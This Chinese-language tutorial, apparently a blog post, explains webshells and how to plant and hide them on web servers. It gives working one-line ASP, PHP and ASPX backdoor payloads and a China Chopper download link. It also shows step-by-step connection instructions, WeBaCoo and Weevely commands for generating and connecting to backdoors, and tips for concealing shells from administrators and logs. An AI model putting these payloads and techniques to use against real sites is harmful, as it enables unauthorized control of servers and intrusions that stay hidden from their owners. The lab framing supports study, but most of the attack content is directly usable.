一、Webshell的作用

(1)一方面，webshell被站长常常用于网站管理、服务器管理等等，根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

(2)另一方面，被入侵者利用，从而达到控制网站服务器的目的。这些网页脚本常称为WEB脚本木马，比较流行的asp或php木马，也有基于.NET的脚本木马与JSP脚本木马。国内常用的WebShell有海阳ASP木马，Phpspy，c99shell等。

二、Webshell的种类

Webshell根据脚本可以分为PHP脚本木马，ASP脚本木马，也有基于.NET的脚本木马和JSP脚本木马。在国外，还有用python脚本语言写的动态网页，当然也有与之相关的Webshell。根据功能也分为大马与小马，小马通常指的一句话木马。

三、WebShell隐蔽

WebShell后门具有隐蔽性,一般有隐藏在正常文件中并修改文件时间达到隐蔽的，还有利用服务器漏洞进行隐藏,如"…"目录就可以达到，站长从FTP中找到的是含有“…”的文件夹，而且没有权限删除,还有一些隐藏的WebShell，可以隐藏于正常文件带参数运行脚本后门。WebShell可以穿越服务器防火墙，由于与被控制的服务器或远程过80端口传递的，因此不会被防火墙拦截。并且使用WebShell一般不会在系统日志中留下记录，只会在网站的web日志中留下一些数据提交记录，没有经验的管理员是很难看出入侵痕迹的。

四、Webshell的使用

利用上传漏洞可以直接上传我们的一句话木马about.php，命名为about.php主要是为了WebShell的隐藏。

拿到webshell，通过WebShell连接工具进行连接，进行下一步的操作。

windows平台

中国菜刀

支持asp、php、asp.net和jsp等，可能被IDS、AV、WAF、扫描器软件发现查杀。

主要功能有文件管理（有足够的权限时候可以管理整个磁盘/文件系统），数据库管理，虚拟终端。

中国菜刀下载地址：

https://xiazai.zol.com.cn/detail/44/438518.shtml#comment

友情小提示：点下图红框框这里，别点上面的高速要不然它会先自动给你下载个加速器，电信下载就好了，软件很小只。

第一步：我们首先要新建一个php文件，文件名随意取，然后写入一句代码： ；eval()这个函数大家并不陌生吧，就是把里面的字符串作为PHP代码执行。最后把这个文件保存，上传到你站点里面，可以是根目录，也可以是其他，都行的。

第二步：打开菜刀这个软件，进入如下界面，右键点击“添加”；如下图：

第三步：此时会弹出一个添加shell的对话框，由图一看出我的 “dxr.php”上传在站点根目录，所以这里的地址填为：http://localhost/dxr.php 。地址后面的小框框里面的“ee”就是你的“口令”，也就是 这里的“ee”。下面配置项如果你知道用户名密码就填，不知道，不填，也不会影响文件管理和虚拟终端这两个功能，只是不能查看数据库了。

最后：点击“添加”按钮，成功后就会产生一条新的记录，鼠标右键点击就可以进行操作了，如下图，可以进行文件管理，数据库管理，虚拟终端。哈哈...大功告成！！

一句话木马总结

asp一句话木马：

<%execute(request("pass"))%>

php一句话木马：

 @eval($_POST[pass]);?>

aspx一句话木马：

<%@ Page Language="Jscript"%>
<%eval(Request.Item["pass"])%>

Kali平台

WeBaCoo（Web Backdoor Cookie）

获取的是类终端的shell，通信内容base64编码后通过cookie头传输，隐蔽性较强。

缺点是不能指定密码。

cookie中的参数

• cm: base64编码的命令

• cn: 服务器用于返回数据的cookie头的名

• cp: 返回信息定界符

使用方法

1、生成服务器端

wenacoo -g -o a.php

2、上传后用客户端进行连接

webacoo -t -u http://1.1.1.1/a.php

Weevely（只支持PHP）

weevely是适用于php网站的webshell工具，学之可受用终身，慎重慎重。

• 用http头进行指令传输
• 隐蔽的类终端PHP Webshell

• 有30多个管理模块

  • 执行系统命令、浏览文件系统

  • 检查服务器常见配置错误

  • 创建正向、反向TCP Shell连接

  • 通过目标计算机代理HTTP流量

  • 从目标计算机运行端口扫描，渗透内网

• 支持连接密码

使用方法

1、生成服务端

weevely generate <password> b.php

生成的文件在 /usr/share/weevely/ 目录下。

2、 连接客户端

weevely <URL> <password>

3、 输入help查看模块

Weevely使用案例

主机A：ubuntu14.04 + php文件上传接口，IP：192.168.162.135

主机B：kali2017.2 + weevely，IP：192.168.162.136

在主机B中使用weevely创建后门脚本，如下：

将helloShell.php上传到主机B中，如下：

利用weevely访问上传的helloShell.php，如下：

在主机B中进入了主机A，可创建文件，OK！